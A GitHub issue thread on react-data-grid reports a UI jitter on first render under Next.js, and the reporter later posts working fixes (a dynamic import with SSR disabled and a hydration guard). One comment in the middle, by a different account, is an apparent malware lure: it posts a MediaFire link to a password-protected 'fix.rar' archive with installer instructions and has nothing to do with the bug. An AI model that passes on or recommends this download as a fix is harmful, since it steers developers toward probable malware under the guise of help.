### ISSUE TITLE
UI jitters after initial load using Next.js

### ISSUE THREAD

**Issue by joseandro** [adazzle/react-data-grid#3587]
## Describe the bug 
On Next.js I see the UI only displaying two columns and a few rows on its first render. Before the UI finishes loading, the width gets recalculated to its proper dimensions and the UI gets rendered again to fulfill the entire container, causing a jitter. 

Here's an example using an adaptation of the [existing column reordering demo](https://adazzle.github.io/react-data-grid/#/columns-reordering) to Next.js:
![UI flickering](https://github.com/user-attachments/assets/49c9c751-caab-42ed-8433-2e38866f2fdf)

## To Reproduce 
1. Add `react-data-grid` to a brand new Next.js project.
2. Load the UI and you will see this behavior.

Link to code example:
https://stackblitz.com/edit/stackblitz-starters-mxg89j?file=app%2Fpage.tsx

## Expected behavior 
No jitter

## Environment
- Use `next` >= 13 (Same behavior in 14, but I didn't test this code in nex.js previous releases).
- Use `react` & `react-dom` 18
- Use `react-data-grid` >= 7.0.0-beta.42 (I didn't test this code in older releases).

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by joseandro** [comment]
The pre-jitter UI we see in the example I provided above is the initial state Next.js renders prior hydration. However, the library only calculates the grid dimensions after TS/JS is loaded. I fixed the problem by importing `react-data-grid` as such:

```typescript
const DataGrid = dynamic(() => import('react-data-grid'), { ssr: false });
``` 

Hope it helps others too.

**Comment by joseandro** [comment]
For future reference, if you don't want to use dynamic imports you can do something along these lines:

```typescript
  const [isHydrated, setIsHydrated] = useState(false);

  useEffect(() => {
    setIsHydrated(true);
  }, []);
  if (!isHydrated) {
    // Show some placeholder UI while it hydrates
    return <EmptyRowsRenderer />;
  }

  return (
    <DataGrid
      columns={columns}
      rows={data}
      rowKeyGetter={rowKeyGetter}
      rowHeight={55}
      className="h-full"
    />
  );

```
